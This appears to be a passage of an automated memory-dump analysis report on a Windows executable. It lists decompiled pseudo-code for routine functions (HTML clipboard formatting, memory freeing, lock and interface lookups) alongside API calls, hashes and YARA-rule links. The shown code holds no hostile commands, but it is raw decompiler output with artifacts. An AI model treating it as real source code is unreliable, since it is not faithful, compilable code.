                                                                                                                0x00000000
                                                                                                                0x00ecc186
                                                                                                                0x00ecc151
                                                                                                                0x00ecc151
                                                                                                                0x00ecc151
                                                                                                                0x00000000
                                                                                                                0x00ecc009
                                                                                                                0x00ecc009
                                                                                                                0x00ecc01c
                                                                                                                0x00ecc024
                                                                                                                0x00ecc032
                                                                                                                0x00ecc037
                                                                                                                0x00ecc03d
                                                                                                                0x00ecc03e
                                                                                                                0x00ecc040
                                                                                                                0x00ecc044
                                                                                                                0x00ecc04a
                                                                                                                0x00ecc04b
                                                                                                                0x00ecc053
                                                                                                                0x00ecc28e
                                                                                                                0x00ecc28e
                                                                                                                0x00000000
                                                                                                                0x00ecc061
                                                                                                                0x00ecc061
                                                                                                                0x00ecc067
                                                                                                                0x00ecc06a
                                                                                                                0x00ecc079
                                                                                                                0x00ecc079
                                                                                                                0x00ecc081
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecc06f
                                                                                                                0x00ecc074
                                                                                                                0x00ecc076
                                                                                                                0x00ecc08c
                                                                                                                0x00ecc08f
                                                                                                                0x00ecc095
                                                                                                                0x00ecc097
                                                                                                                0x00ecc2c3
                                                                                                                0x00ecc2c7
                                                                                                                0x00ecc2ce
                                                                                                                0x00ecc2d3
                                                                                                                0x00ecc2d7
                                                                                                                0x00ecc2e0
                                                                                                                0x00ecc2e6
                                                                                                                0x00ecc2eb
                                                                                                                0x00ecc2ed
                                                                                                                0x00ecc2fd
                                                                                                                0x00ecc30d
                                                                                                                0x00ecc318
                                                                                                                0x00ecc320
                                                                                                                0x00ecc321
                                                                                                                0x00ecc32b
                                                                                                                0x00ecc331
                                                                                                                0x00ecc339
                                                                                                                0x00ecc33a
                                                                                                                0x00ecc344
                                                                                                                0x00ecc34f
                                                                                                                0x00ecc35a
                                                                                                                0x00ecc366
                                                                                                                0x00ecc370
                                                                                                                0x00ecc37f
                                                                                                                0x00ecc38c
                                                                                                                0x00ecc390
                                                                                                                0x00ecc395
                                                                                                                0x00ecc397
                                                                                                                0x00ecc399
                                                                                                                0x00ecc3a5
                                                                                                                0x00ecc3aa
                                                                                                                0x00ecc3b0
                                                                                                                0x00ecc3b5
                                                                                                                0x00ecc3b5
                                                                                                                0x00ecc3b7
                                                                                                                0x00ecc3b7
                                                                                                                0x00ecc3bd
                                                                                                                0x00ecc3c4
                                                                                                                0x00ecc3c4
                                                                                                                0x00ecc2ef
                                                                                                                0x00ecc290
                                                                                                                0x00ecc290
                                                                                                                0x00000000
                                                                                                                0x00ecc290
                                                                                                                0x00ecc078
                                                                                                                0x00ecc078
                                                                                                                0x00ecc078
                                                                                                                0x00000000
                                                                                                                0x00ecc083
                                                                                                                0x00ecc053

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _strncpy$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                • String ID: +x$+x
                                                                                                                • API String ID: 2527496121-1761420664
                                                                                                                • Opcode ID: 4314f5e9a3e6763968e9ba67b6b2b0d2cadaaf940cfd5807e19862542e18f22f
                                                                                                                • Instruction ID: 30ca214be3634b7b67d1a09f40fd001a7ba8b1ba669b702c9b29fbcb8efe18b9
                                                                                                                • Opcode Fuzzy Hash: 4314f5e9a3e6763968e9ba67b6b2b0d2cadaaf940cfd5807e19862542e18f22f
                                                                                                                • Instruction Fuzzy Hash: D1B19FB16043089FC314DF68ED81F6A77E5FB88304F18166EF849E7365E7729806AB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECE1D2, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00ECE1D2(void* __ecx, void* __edx) {
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t60;
				intOrPtr* _t62;
				short* _t64;
				short* _t66;
				intOrPtr* _t70;
				long _t72;
				void* _t74;
				void* _t75;

				_t60 = __edx;
				_t45 = __ecx;
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					return _t20;
				}
				 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t74 + 0x1c));
				 *((char*)(_t74 + 0x13)) = E00ECE07A(_t62);
				_push(0x200 + E00ED8683(_t62) * 2);
				_t24 = E00EDA91B(_t45);
				_t66 = _t24;
				if(_t66 == 0) {
					L16:
					return _t24;
				}
				E00EDB78E(_t66, L"<html>");
				E00EDC237(_t66, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00EDC237(_t66, L"utf-8\"></head>");
				_t75 = _t74 + 0x18;
				_t70 = _t62;
				_t28 = 0x20;
				if( *_t62 != _t28) {
					L4:
					_t29 = E00EC7B9E(_t79, _t70, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t75 + 0x18)) = _t31;
					if(_t31 != 0) {
						_t62 = _t70 + 0xc;
					}
					E00EDC237(_t66, _t62);
					if( *((char*)(_t75 + 0x20)) == 0) {
						E00EDC237(_t66, L"</html>");
					}
					_t82 =  *((char*)(_t75 + 0x13));
					if( *((char*)(_t75 + 0x13)) == 0) {
						_push(_t66);
						_t66 = E00ECE438(_t60, _t82);
					}
					_t72 = 9 + E00ED8683(_t66) * 6;
					_t64 = GlobalAlloc(0x40, _t72);
					if(_t64 != 0) {
						_t13 = _t64 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t66, 0xffffffff, _t13, _t72 - 3, 0, 0) == 0) {
							 *_t64 = 0;
						} else {
							 *_t64 = 0xbbef;
							 *((char*)(_t64 + 2)) = 0xbf;
						}
					}
					L00ED869E(_t66);
					_t24 =  *0xf2614c(_t64, 1, _t75 + 0x14);
					if(_t24 >= 0) {
						E00ECE0B1( *((intOrPtr*)(_t44 + 0x10)));
						_t38 =  *((intOrPtr*)(_t75 + 0x10));
						 *0xee7220(_t38,  *((intOrPtr*)(_t75 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t70 + 2;
					_t79 =  *_t70 - _t28;
				} while ( *_t70 == _t28);
				goto L4;
			}


















                                                                                                                0x00ece1d2
                                                                                                                0x00ece1d2
                                                                                                                0x00ece1d6
                                                                                                                0x00ece1dc
                                                                                                                0x00ece323
                                                                                                                0x00ece323
                                                                                                                0x00ece1e2
                                                                                                                0x00ece1e9
                                                                                                                0x00ece1f4
                                                                                                                0x00ece204
                                                                                                                0x00ece205
                                                                                                                0x00ece20a
                                                                                                                0x00ece210
                                                                                                                0x00ece31d
                                                                                                                0x00000000
                                                                                                                0x00ece31e
                                                                                                                0x00ece21d
                                                                                                                0x00ece228
                                                                                                                0x00ece233
                                                                                                                0x00ece238
                                                                                                                0x00ece23b
                                                                                                                0x00ece23f
                                                                                                                0x00ece243
                                                                                                                0x00ece24e
                                                                                                                0x00ece256
                                                                                                                0x00ece25d
                                                                                                                0x00ece25f
                                                                                                                0x00ece261
                                                                                                                0x00ece265
                                                                                                                0x00ece267
                                                                                                                0x00ece267
                                                                                                                0x00ece26c
                                                                                                                0x00ece278
                                                                                                                0x00ece280
                                                                                                                0x00ece286
                                                                                                                0x00ece287
                                                                                                                0x00ece28c
                                                                                                                0x00ece28e
                                                                                                                0x00ece296
                                                                                                                0x00ece296
                                                                                                                0x00ece2a2
                                                                                                                0x00ece2ae
                                                                                                                0x00ece2b2
                                                                                                                0x00ece2bc
                                                                                                                0x00ece2d1
                                                                                                                0x00ece2de
                                                                                                                0x00ece2d3
                                                                                                                0x00ece2d3
                                                                                                                0x00ece2d8
                                                                                                                0x00ece2d8
                                                                                                                0x00ece2d1
                                                                                                                0x00ece2e2
                                                                                                                0x00ece2f0
                                                                                                                0x00ece2f9
                                                                                                                0x00ece304
                                                                                                                0x00ece309
                                                                                                                0x00ece315
                                                                                                                0x00ece31b
                                                                                                                0x00ece31b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ece245
                                                                                                                0x00ece245
                                                                                                                0x00ece245
                                                                                                                0x00ece248
                                                                                                                0x00ece248
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00ECE2A8
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00ECE2C9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocByteCharGlobalMultiWide
                                                                                                                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                • API String ID: 3286310052-4209811716
                                                                                                                • Opcode ID: 7f77a87e75b7539b71847565b35e6a04eb982d74bcbd0b0c033953bd6d295d9d
                                                                                                                • Instruction ID: ad3f64af86a2bbcc1be24f3f1998e27fcff12cb80c266968ebabd13ee2d234cf
                                                                                                                • Opcode Fuzzy Hash: 7f77a87e75b7539b71847565b35e6a04eb982d74bcbd0b0c033953bd6d295d9d
                                                                                                                • Instruction Fuzzy Hash: 7E3139321043456BD724AB649E02F6F77ACDF41720F14111EF954B73E2EB65990B83A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF563, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00ECF56C
                                                                                                                • GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00ECF2F8,?,?,?), ref: 00ECF59B
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00ECF633
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ObjectRelease
                                                                                                                • String ID: ,$/,$W,
                                                                                                                • API String ID: 1429681911-4126225741
                                                                                                                • Opcode ID: 530e6f59f368337b59b4717bcfe675901cd94e51023bf15fcf400bd6fd036dcb
                                                                                                                • Instruction ID: 03adf79b6f846ad93922083faa8499c5f720c13183b01b6469799bbec7efdfe5
                                                                                                                • Opcode Fuzzy Hash: 530e6f59f368337b59b4717bcfe675901cd94e51023bf15fcf400bd6fd036dcb
                                                                                                                • Instruction Fuzzy Hash: 92211976509308EFD3119FA1DC48D6BBFF9FF8C365F000829FA45D2220C635995AAB66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE1054, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EE1054(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00EE1018(_t45, 7);
					E00EE1018(_t45 + 0x1c, 7);
					E00EE1018(_t45 + 0x38, 0xc);
					E00EE1018(_t45 + 0x68, 0xc);
					E00EE1018(_t45 + 0x98, 2);
					E00EDD5AA( *((intOrPtr*)(_t45 + 0xa0)));
					E00EDD5AA( *((intOrPtr*)(_t45 + 0xa4)));
					E00EDD5AA( *((intOrPtr*)(_t45 + 0xa8)));
					E00EE1018(_t45 + 0xb4, 7);
					E00EE1018(_t45 + 0xd0, 7);
					E00EE1018(_t45 + 0xec, 0xc);
					E00EE1018(_t45 + 0x11c, 0xc);
					E00EE1018(_t45 + 0x14c, 2);
					E00EDD5AA( *((intOrPtr*)(_t45 + 0x154)));
					E00EDD5AA( *((intOrPtr*)(_t45 + 0x158)));
					E00EDD5AA( *((intOrPtr*)(_t45 + 0x15c)));
					return E00EDD5AA( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                                                                                0x00ee105a
                                                                                                                0x00ee105f
                                                                                                                0x00ee1068
                                                                                                                0x00ee1073
                                                                                                                0x00ee107e
                                                                                                                0x00ee1089
                                                                                                                0x00ee1097
                                                                                                                0x00ee10a2
                                                                                                                0x00ee10ad
                                                                                                                0x00ee10b8
                                                                                                                0x00ee10c6
                                                                                                                0x00ee10d4
                                                                                                                0x00ee10e5
                                                                                                                0x00ee10f3
                                                                                                                0x00ee1101
                                                                                                                0x00ee110c
                                                                                                                0x00ee1117
                                                                                                                0x00ee1122
                                                                                                                0x00000000
                                                                                                                0x00ee1132
                                                                                                                0x00ee1137

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EE1018: _free.LIBCMT ref: 00EE1041
                                                                                                                • _free.LIBCMT ref: 00EE10A2
                                                                                                                  • Part of subcall function 00EDD5AA: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE1046,?,00000000,?,00000000,?,00EE106D,?,00000007,?,?,00EE146A,?), ref: 00EDD5C0
                                                                                                                  • Part of subcall function 00EDD5AA: GetLastError.KERNEL32(?,?,00EE1046,?,00000000,?,00000000,?,00EE106D,?,00000007,?,?,00EE146A,?,?), ref: 00EDD5D2
                                                                                                                • _free.LIBCMT ref: 00EE10AD
                                                                                                                • _free.LIBCMT ref: 00EE10B8
                                                                                                                • _free.LIBCMT ref: 00EE110C
                                                                                                                • _free.LIBCMT ref: 00EE1117
                                                                                                                • _free.LIBCMT ref: 00EE1122
                                                                                                                • _free.LIBCMT ref: 00EE112D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 98249853eed8e755f1088148570a5a7ad21c71074ffaa499ef09204e814cfdc6
                                                                                                                • Instruction ID: d068244317f203f759dcdbc238079e82bdcb3ca2f6127aa3392e8597af62826b
                                                                                                                • Opcode Fuzzy Hash: 98249853eed8e755f1088148570a5a7ad21c71074ffaa499ef09204e814cfdc6
                                                                                                                • Instruction Fuzzy Hash: 45118171644B88EAD630FBB1CC07FCB77DCAF04700F402C96B29A76156DA39B6CA5691
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED71CA, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E00ED71CA(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0xef1570 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00ED828A(__eflags,  *0xef1570);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00ED82C4(__eflags,  *0xef1570, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E00EDD675(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00ED82C4(__eflags,  *0xef1570, 0);
								} else {
									__eflags = E00ED82C4(__eflags,  *0xef1570, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00EDD5AA(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}








                                                                                                                0x00ed71d1
                                                                                                                0x00ed71e4
                                                                                                                0x00ed71eb
                                                                                                                0x00ed71ee
                                                                                                                0x00ed71f1
                                                                                                                0x00ed720a
                                                                                                                0x00ed720a
                                                                                                                0x00ed71f3
                                                                                                                0x00ed71f3
                                                                                                                0x00ed71f5
                                                                                                                0x00ed71ff
                                                                                                                0x00ed7205
                                                                                                                0x00ed7206
                                                                                                                0x00ed7208
                                                                                                                0x00ed7218
                                                                                                                0x00ed721c
                                                                                                                0x00ed721e
                                                                                                                0x00ed7232
                                                                                                                0x00ed7232
                                                                                                                0x00ed723b
                                                                                                                0x00ed7220
                                                                                                                0x00ed722e
                                                                                                                0x00ed7230
                                                                                                                0x00ed7244
                                                                                                                0x00ed7246
                                                                                                                0x00ed7246
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed7230
                                                                                                                0x00ed7249
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed7208
                                                                                                                0x00ed71f5
                                                                                                                0x00ed7251
                                                                                                                0x00ed725b
                                                                                                                0x00ed71d3
                                                                                                                0x00ed71d5
                                                                                                                0x00ed71d5

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,00ED71C1,00ED4688), ref: 00ED71D8
                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00ED71E6
                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00ED71FF
                                                                                                                • SetLastError.KERNEL32(00000000,?,00ED71C1,00ED4688), ref: 00ED7251
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3852720340-0
                                                                                                                • Opcode ID: 0c50cf7dbb1a41d2a43a5317f1c61309c17d8d310fe4a3ef343da56035dbd74d
                                                                                                                • Instruction ID: 2a0e740c7fdeee93ab9d61e60700dc2757882f08161cc14f31bb55fdc1ae2be9
                                                                                                                • Opcode Fuzzy Hash: 0c50cf7dbb1a41d2a43a5317f1c61309c17d8d310fe4a3ef343da56035dbd74d
                                                                                                                • Instruction Fuzzy Hash: D601F17250C719AEA6212BB57C8697726D4EB923F8320222BF590F42F1FE124C0B9544
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2D8F, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00ED2D8F() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0xf25338; // 0x75130000
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0xf2533c = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0xf25340 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}








                                                                                                                0x00ed2d8f
                                                                                                                0x00ed2d9a
                                                                                                                0x00ed2da2
                                                                                                                0x00ed2db4
                                                                                                                0x00ed2db8
                                                                                                                0x00ed2dc4
                                                                                                                0x00ed2dcc
                                                                                                                0x00000000
                                                                                                                0x00ed2dce
                                                                                                                0x00ed2dd4
                                                                                                                0x00ed2dd9
                                                                                                                0x00ed2de1
                                                                                                                0x00000000
                                                                                                                0x00ed2de3
                                                                                                                0x00ed2de3
                                                                                                                0x00ed2de3
                                                                                                                0x00ed2de1
                                                                                                                0x00ed2dba
                                                                                                                0x00ed2dba
                                                                                                                0x00ed2dba
                                                                                                                0x00ed2dba
                                                                                                                0x00ed2df1
                                                                                                                0x00ed2df7
                                                                                                                0x00ed2dff
                                                                                                                0x00ed2e05
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed2e01
                                                                                                                0x00ed2e01
                                                                                                                0x00ed2e01
                                                                                                                0x00ed2e01
                                                                                                                0x00ed2e09
                                                                                                                0x00ed2da4
                                                                                                                0x00ed2da7
                                                                                                                0x00ed2da7
                                                                                                                0x00ed2d9c
                                                                                                                0x00ed2d9f
                                                                                                                0x00ed2d9f

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                • API String ID: 0-1718035505
                                                                                                                • Opcode ID: 42c940285c8f3cbc284844f59d6fa9d933a432fa5e6d65a7c083071c74fdf8cd
                                                                                                                • Instruction ID: a441004ac23ed4a7bcc1fe344f06954d256308bb2d2b85de2d5794ebbe011fc1
                                                                                                                • Opcode Fuzzy Hash: 42c940285c8f3cbc284844f59d6fa9d933a432fa5e6d65a7c083071c74fdf8cd
                                                                                                                • Instruction Fuzzy Hash: A201D1713423665B4F319E656C946E6339ADA22B6A310317FFA41FB300D7618C47A6D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECE550, Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00ECE550(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t17;
				signed int _t23;
				void* _t26;
				signed int _t32;
				signed int* _t36;

				_t36 = _a12;
				if(_t36 != 0) {
					_t34 = _a8;
					_t26 = 0x10;
					if(E00ED51D4(_a8, 0xee90dc, _t26) == 0) {
						L13:
						_t32 = _a4;
						 *_t36 = _t32;
						L14:
						 *0xee7220(_t32);
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 4))))();
						_t17 = 0;
						L16:
						return _t17;
					}
					if(E00ED51D4(_t34, 0xee911c, _t26) != 0) {
						if(E00ED51D4(_t34, 0xee90fc, _t26) != 0) {
							if(E00ED51D4(_t34, 0xee90cc, _t26) != 0) {
								if(E00ED51D4(_t34, 0xee916c, _t26) != 0) {
									if(E00ED51D4(_t34, 0xee90bc, _t26) != 0) {
										 *_t36 =  *_t36 & 0x00000000;
										_t17 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t32 = _a4;
								_t23 = _t32 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t36 =  ~_t32 & _t23;
								goto L14;
							}
							_t32 = _a4;
							_t23 = _t32 + 0xc;
							goto L11;
						}
						_t32 = _a4;
						_t23 = _t32 + 8;
						goto L11;
					}
					_t32 = _a4;
					_t23 = _t32 + 4;
					goto L11;
				}
				return 0x80004003;
			}








                                                                                                                0x00ece554
                                                                                                                0x00ece559
                                                                                                                0x00ece567
                                                                                                                0x00ece56c
                                                                                                                0x00ece57e
                                                                                                                0x00ece60d
                                                                                                                0x00ece60d
                                                                                                                0x00ece610
                                                                                                                0x00ece612
                                                                                                                0x00ece61a
                                                                                                                0x00ece620
                                                                                                                0x00ece622
                                                                                                                0x00ece62e
                                                                                                                0x00000000
                                                                                                                0x00ece62f
                                                                                                                0x00ece595
                                                                                                                0x00ece5b0
                                                                                                                0x00ece5cb
                                                                                                                0x00ece5e6
                                                                                                                0x00ece60b
                                                                                                                0x00ece626
                                                                                                                0x00ece629
                                                                                                                0x00000000
                                                                                                                0x00ece629
                                                                                                                0x00000000
                                                                                                                0x00ece60b
                                                                                                                0x00ece5e8
                                                                                                                0x00ece5eb
                                                                                                                0x00ece5ee
                                                                                                                0x00ece5f2
                                                                                                                0x00ece5f6
                                                                                                                0x00000000
                                                                                                                0x00ece5f6
                                                                                                                0x00ece5cd
                                                                                                                0x00ece5d0
                                                                                                                0x00000000
                                                                                                                0x00ece5d0
                                                                                                                0x00ece5b2
                                                                                                                0x00ece5b5
                                                                                                                0x00000000
                                                                                                                0x00ece5b5
                                                                                                                0x00ece597
                                                                                                                0x00ece59a
                                                                                                                0x00000000
                                                                                                                0x00ece59a
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
